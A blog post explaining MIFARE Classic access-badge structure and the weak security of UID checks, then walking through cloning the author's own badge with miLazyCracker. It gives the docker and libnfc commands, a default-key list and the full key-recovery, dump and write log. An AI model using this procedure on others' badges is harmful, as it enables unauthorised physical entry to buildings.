Cloning NFC badges
Access badges are annoying.
A while back, I got interested on the topic. The initial idea was to be able to merge several badges, so that I wouldn’t have to carry several of them around. It turns out that’s generally not possible (see why below), but just cloning them usually is, and pretty easily.
Even without merging, cloning badges is both interesting from a security point of view, and useful as well : replace lost badge, get as many badges as you have keys of your home, copy them to a smaller badge, etc…
That last reason is the one that actually got me going : I’m trying to put my keychain into a more manageable format (more on that topic later), and the access badge on it is part of the job.
General knowledge on access badges
I initially had no idea about what I was looking for. Researching the topic wasn’t exactly easy, so I’ll try to make a decent TL;DR for anybody first jumping on the topic. This content is by no means meant to be authoritative in any way, it’s what I could understand from my research here and there. If you were to spot any mistake, please let me know !
As you might expect, there’s not a single technology used in access badges, but several.
Let’s start with communication bands.
125kHz
That’s the “classic” RFID band.
It’s the one usually used wherever you hear people talking about RFID and scanning stuff wirelessly, like in warehouses (etc.), but it’s also often used for access badges.
As far as I can tell, those normally are exclusively read-only, and only provide the reader with an id (without any kind of reader authentication whatsoever), that then needs to be checked against some kind of whitelist / database, etc.
There are a few different protocoles for those cards, but it’s apparently all broken since at least 2003.
Nowadays there even are handheld cloners that just let you scan a badge and clone it to another. This obviously requires some specific target badges (normal badges are read-only), but those are cheap and pretty easy to find too.
TL;DR : If you have such a badge, you’ve won.
13.56 MHz : this is the NFC
This seems to be the most common standard nowadays.
These are the same kind of NFC tags you would use with your phone to open a url, etc.
Soooo… about trying to read your badge before buying any hardware ?
“There’s an app for that”, and it’s called Mifare Classic Tool(also available on Play Store) on Android. I have no idea if there’s an equivalent for iOS.
If you’re able to read your badge with this, read on.
MIFARE tags structure and usage
Wikipedia explains this part better than me :
The MIFARE Classic with 1K memory offers 1,024 bytes of data storage, split into 16 sectors; each sector is protected by two different keys, called A and B. Each key can be programmed to allow operations such as reading, writing, increasing value blocks, etc. MIFARE Classic with 4K memory offers 4,096 bytes split into forty sectors, of which 32 are same size as in the 1K with eight more that are quadruple size sectors. MIFARE Classic Mini offers 320 bytes split into five sectors. For each of these IC types, 16 bytes per sector are reserved for the keys and access conditions and can not normally be used for user data. Also, the very first 16 bytes contain the serial number of the card and certain other manufacturer data and are read only.
To illustrate what this block of text means, let’s borrow a schema from onion.io docs :
So, the tag is made of several sectors, each divided into 4 blocks.
The first section of the schema represents sector 0, the first one. We’ll come back to this one in a bit.
All the other sectors on the tag are like the bottom one : 3 blocks you can use for whatever you want, and one block containing 2 keys, and the corresponding permissions.
A classic setup would be :
- Key A is allowed to read the data. The card reader has this key, in order to check you have required permissions. This is often a very dummy key, such as ffffffffffff, in which case the info is essentially publicly-readable.
- Key B is allowed to write the data or the keys/permissions. This one is kept and carefully protected by whoever’s in charge of delivering access badges.
You have (at least) 16 such sectors on a badge, but do you need that much ?
Usually, no. Most access badges only ever write data in a sector or two.
Hence, the idea to merge several tags into a single one : if I have 2 separate tags, one with data in sector 2, and one in sector 4 ; I should be able to merge them !
In theory, yes. But for this to work, you would need each reader to only check a distinct subset of sectors, which never happens because :
- People choosing the sector numbers they use are not original. Almost everybody takes either the first or the last few sectors.
- It would seem that some readers check that everything else is zeros anyway.
- Most readers will also make specific checks on sector 0.
Back to the specific case of sector 0 :
The first block of sector 0 (block 0) is read-only, and contains an UID set by the manufacturer. This way, 2 tags cannot ever be identical, even if you write the same contents and keys on them.
So, why would a reader check this block specifically ? In a word : blacklists.
Say, a badge is lost or stolen. The first thing you want to do is make sure it can’t be used anymore.
- You can’t change the contents of the badge because, well, it’s lost
- You could have the authorizations written on the badge expire and need to be renewed periodically, but an attacker could still use the badge up to its expiration
- In the end you have no choice but to have some way for the reader to identify this badge specifically, and refuse it. So, a blacklist.1
You could implement it yourself, but there’s already the UID, so, why bother ?
The badge is already uniquely identifiable without you doing anything ! Even better, that’s an ID that cannot be accidentally erased when configuring badges, or cloned by an attacker who would find a way to crack the keys… everything is great !
… that’s the theory anyway.
An attacker doesn’t care that the UID is meant to be read-only. He usually has tags with writable UIDs2, making the entire UID-is-read-only thing pointless.3
Still, many readers check the UID, either as a blacklist or as a whitelist. The exact implementation barely matters for us : we’re gonna need to get tags with writable UIDs, and copy… the entire badge.
Attacks and tooling
I’m not gonna get into the details of the attacks here, but basically :
- there’s one attack allowing you to easily recover all keys and contents if you know at least one key on the entire badge
- there’s another one, slower, able to recover a key in minutes without any anterior knowledge (and then switch back to the first attack with that key)
TD;DR : security on this kind of badges is broken. Simply broken.
Still, until a few years back, tooling to do this was diffiult to come by.
That is, until REcon 2017 Brussels Hacking4, where enters miLazyCracker (The original code repo is down, but it’s still available On GitHub).
Anyway, that doesn’t matter, ‘cause I’ll be using a docker image anyway.
Next, we need some hardware. Basically, any NFC USB reader should do the trick. For reference, here are mine :
Plug everything together (VCC on VCC, GND on GND, TX on RX, RX on TX), plug the usb into your computer, and you should be fine !
Actually running the attack
As mentioned, we’ll be using docker to avoid having to install anything and save some time.
$ docker run -it --privileged --device=/dev/ttyUSB0 bennes/milazycracker:latest
# We first need to configure libnfc with our hardware model
root@d8e230b9b368:/app# echo 'device.connstring = "pn532_uart:/dev/ttyUSB0"' >> /etc/nfc/libnfc.conf
# Then just run miLazyCracker
root@d8e230b9b368:/app# miLazyCracker
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): f5 47 ea 5d
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [................]
[Key: a0a1a2a3a4a5] -> [/............../]
[Key: d3f7d3f7d3f7] -> [/............../]
[Key: 000000000000] -> [/............../]
[Key: b0b1b2b3b4b5] -> [/............../]
[Key: 4d3a99c351dd] -> [/............../]
[Key: 1a982c7e459a] -> [/............../]
[Key: aabbccddeeff] -> [/............../]
[Key: 714c5c886e97] -> [/............../]
[Key: 587ee5f9350f] -> [/............../]
[Key: a0478cc39091] -> [/............../]
[Key: 533cb6c723f6] -> [/............../]
[Key: 8fd0a4f256e9] -> [/............../]
Sector 00 - Found Key A: a0a1a2a3a4a5 Unknown Key B
Sector 01 - Unknown Key A Unknown Key B
Sector 02 - Unknown Key A Unknown Key B
Sector 03 - Unknown Key A Unknown Key B
Sector 04 - Unknown Key A Unknown Key B
Sector 05 - Unknown Key A Unknown Key B
Sector 06 - Unknown Key A Unknown Key B
Sector 07 - Unknown Key A Unknown Key B
Sector 08 - Unknown Key A Unknown Key B
Sector 09 - Unknown Key A Unknown Key B
Sector 10 - Unknown Key A Unknown Key B
Sector 11 - Unknown Key A Unknown Key B
Sector 12 - Unknown Key A Unknown Key B
Sector 13 - Unknown Key A Unknown Key B
Sector 14 - Unknown Key A Unknown Key B
Sector 15 - Found Key A: a0a1a2a3a4a5 Unknown Key B
Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 53151 .....
Sector: 1, type A, probe 1, distance 53151 .....
Sector: 1, type A, probe 2, distance 53149 .....
Found Key: A [REDACTEDREDA]
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Sector: 2, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 3, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 4, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 5, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 6, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 7, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 8, type A, probe 0, distance 53147 .....
Sector: 8, type A, probe 1, distance 53099 .....
Found Key: A [REDACTEDREDA]
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Sector: 9, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 10, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 11, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 12, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 13, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 14, type A
Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Found Key: A [REDACTEDREDA]
Sector: 0, type B, probe 0, distance 53105 .....
Sector: 0, type B, probe 1, distance 53151 .....
Sector: 0, type B, probe 2, distance 53091 .....
Found Key: B [REDACTEDREDA]
Sector: 1, type B, probe 0, distance 53149 .....
Found Key: B [REDACTEDREDA]
Sector: 2, type B
Found Key: B [REDACTEDREDA]
Sector: 3, type B
Found Key: B [REDACTEDREDA]
Sector: 4, type B
Found Key: B [REDACTEDREDA]
Sector: 5, type B
Found Key: B [REDACTEDREDA]
Sector: 6, type B
Found Key: B [REDACTEDREDA]
Sector: 7, type B
Found Key: B [REDACTEDREDA]
Sector: 8, type B
Found Key: B [REDACTEDREDA]
Sector: 9, type B
Found Key: B [REDACTEDREDA]
Sector: 10, type B
Found Key: B [REDACTEDREDA]
Sector: 11, type B
Found Key: B [REDACTEDREDA]
Sector: 12, type B
Found Key: B [REDACTEDREDA]
Sector: 13, type B
Found Key: B [REDACTEDREDA]
Sector: 14, type B
Found Key: B [REDACTEDREDA]
Sector: 15, type B
Found Key: B [REDACTEDREDA]
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 62, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 61, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 60, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 59, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 58, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 57, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 56, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 55, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 54, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 53, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 52, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 51, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 50, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 49, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 48, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 47, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 46, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 45, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 44, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 43, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 42, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 41, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 40, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 39, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 38, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 37, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 36, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 35, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 34, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 33, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 32, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 31, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 30, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 29, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 28, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 27, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 26, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 25, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 24, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 23, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 22, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 21, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 20, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 19, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 18, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 17, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 16, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 15, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 14, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 13, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 12, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 11, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 10, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 09, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 08, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 07, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 06, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 05, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 04, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 03, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 02, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 01, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Block 00, type A, key REDACTEDREDA :RE DA CT ED RE DA CT ED RE DA CT ED RE DA CT ED
Dump left in: mfc_f547ea5d_dump.mfd
Do you want clone the card? Place card on reader now and press Y [y/n] Y
NFC reader: pn532_uart:/dev/ttyUSB0 opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): f5 47 ea 5d
SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Writing 64 blocks |.........xroot@d8e230b9b368:/app#
root@d8e230b9b368:/app#
Tadaaaa !
-
This either requires the reader to be online, or some processus to manually update the reader’s blacklist… ↩︎
-
You can find those very easily on Amazon, alibaba, etc… and they’re cheap. ↩︎
-
I suppose in theory, you could have the reader have a key allowed to write to sector 0 and check it can actually write data on blocks 1 and 2, but not on block 0… but then the attackers would just need to make tags for which they can make the UID read-only after setting it… it’s a losing battle from the defender’s point of view. You can’t prevent the attacker from doing whatever they want with the tag they’re gonna present you. ↩︎
-
This conference explains pretty well the attacks and the structure of the cards, go watch it if you’re interested ↩︎